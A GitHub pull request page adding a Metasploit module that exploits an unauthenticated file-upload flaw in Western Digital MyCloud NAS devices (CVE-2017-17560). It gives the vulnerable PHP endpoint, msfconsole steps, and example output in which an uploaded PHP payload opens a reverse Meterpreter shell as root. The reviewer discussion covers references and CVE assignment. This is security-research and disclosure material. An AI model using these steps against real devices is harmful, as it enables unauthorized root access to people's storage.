Skip to content

Add wd_mycloud_multiupload_upload exploit #9248

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 2 commits into from
Dec 14, 2017
Merged

Add wd_mycloud_multiupload_upload exploit #9248

merged 2 commits into from
Dec 14, 2017

Conversation

Zenofex
Copy link
Contributor

@Zenofex Zenofex commented Nov 28, 2017

This pull request adds a Western Digital MyCloud unauthenticated command execution exploit.

This module exploits a file upload vulnerability found in Western Digital's MyCloud NAS web administration HTTP service. The /web/jquery/uploader/multi_uploadify.php PHP script provides multipart upload functionality that is accessible without authentication and can be used to place a file anywhere on the device's file system. This allows an attacker the ability to upload a PHP shell onto the device and obtain arbitrary code execution as root.

This module was tested successfully on a MyCloud PR4100 with firmware version 2.30.172

Verification

  • Start msfconsole
  • use exploit/linux/http/wd_mycloud_multiupload_upload
  • set RHOST [IP]
  • check
  • Verify device reported as vulnerable
  • run
  • Verify shell is spawned

Example Output

msf > use exploit/linux/http/wd_mycloud_multiupload_upload
msf exploit(wd_mycloud_multiupload_upload) > set RHOST 192.168.86.104
RHOST => 192.168.86.104
msf exploit(wd_mycloud_multiupload_upload) > check
[+] 192.168.86.104:80 The target is vulnerable.
msf exploit(wd_mycloud_multiupload_upload) > run

[*] Started reverse TCP handler on 192.168.86.215:4444 
[*] Uploading PHP payload (1124 bytes) to '/var/www'.
[+] Uploaded PHP payload successfully.
[*] Making request for '/.7bc5NqFMK5.php' to execute payload.
[*] Sending stage (37543 bytes) to 192.168.86.104
[*] Meterpreter session 1 opened (192.168.86.215:4444 -> 192.168.86.104:38086) at 2017-11-28 06:07:14 -0600
[+] Deleted .7bc5NqFMK5.php

meterpreter > getuid
Server username: root (0)

@bcoles bcoles self-requested a review November 28, 2017 13:37
@bcoles
Copy link
Contributor

bcoles commented Nov 28, 2017

Thanks @Zenofex

Please send a PCAP to msfdev [at] metasploit.com

@bcoles bcoles added the module label Nov 28, 2017
],
'References' =>
[
['URL', 'https://www.exploitee.rs/index.php/Western_Digital_MyCloud'],
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

And if this is the first place the vuln has been properly documented, feel free to add a link to this PR:

#9248

If it's described in a published DEFCON talk, a link to that presentation or paper would be super handy, too.

@todb-r7
Copy link

todb-r7 commented Nov 29, 2017

So there's no CVE or BID or any other kind of reference number or name on this module. I'm pretty sure I recall you mentioning that you already disclosed to the vendor before DEFCON -- did they assign a ticket number or anything? I just would like to follow up with them and ask if they'd like us to assign a CVE for this.

@Zenofex
Copy link
Contributor Author

Zenofex commented Nov 29, 2017

Hey todb,

We disclosed to the vendor at DEFCON 25 and in the weeks after over email but they have been unresponsive. We do not have a CVE but are happy to do whatever you think is appropriate. I can add a link to the presentation slides and/or video as well, how would you like me to proceed?

@wwebb-r7
Copy link
Contributor

@Zenofex regardless of whatever you and @todb decide on the lack of CVE, it would be helpful to go ahead and link any presentation or video you have in the references.

@todb-r7
Copy link

todb-r7 commented Nov 29, 2017

Yep, a link to the presentation material in the References would be super helpful.

I'll bug them and see if I can't get a response myself. Thanks, @Zenofex !

@busterb busterb self-assigned this Nov 30, 2017
@busterb
Copy link
Contributor

busterb commented Nov 30, 2017

Verified pcap, this looks good. Thanks @Zenofex

@Zenofex
Copy link
Contributor Author

Zenofex commented Nov 30, 2017

Added the requested additional reference URLs. todb, let me know if anything is needed from me for the CVEs.

@todb-r7
Copy link

todb-r7 commented Dec 8, 2017

Welp, it's been 9 days I haven't heard anything back -- and according to our CNA agreement, we shan't be assigning a CVE unless the vendor acknowledges.

So, the lack of CVE shouldn't hold anything up, since we have decent secondary references. I'll bug CERT/CC and see if they can toss one our way. If so, I'll add it post-facto.

@todb-r7
Copy link

todb-r7 commented Dec 8, 2017

Reported to CERT/CC, they have a tracking number VRF#17-12-JQCYD for it now.

@todb-r7
Copy link

todb-r7 commented Dec 12, 2017

CVE Request 432582 for CVE ID filed. Bccause Western Digital has failed to acknowledge this vulnerability (despite the overwhelming evidence that it exists), Rapid7 is unable to assign a CVE ourselves. We've sent the request up to MITRE who can assign out of their block (we used to get these out of CERT/CC, but apparently that's now how it works anymore, which is fine).

@todb-r7
Copy link

todb-r7 commented Dec 12, 2017

CVE-2017-17560 has been allocated for this.

I think we're good to land this, right @bcoles ? I can either ninja-edit the references to include this on merging, or you can.

@bcoles
Copy link
Contributor

bcoles commented Dec 13, 2017

@todb-r7 +1 looks good to me

@busterb busterb merged commit 1ced399 into rapid7:master Dec 14, 2017
@busterb
Copy link
Contributor

busterb commented Dec 14, 2017

Added cve reference and landed 125a079 - thanks!

@busterb
Copy link
Contributor

busterb commented Dec 14, 2017

Release Notes

This adds a Western Digital MyCloud unauthenticated command execution exploit, CVE-2017-17560.

@Zenofex
Copy link
Contributor Author

Zenofex commented Dec 14, 2017

Woohoo, thanks everyone!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

6 participants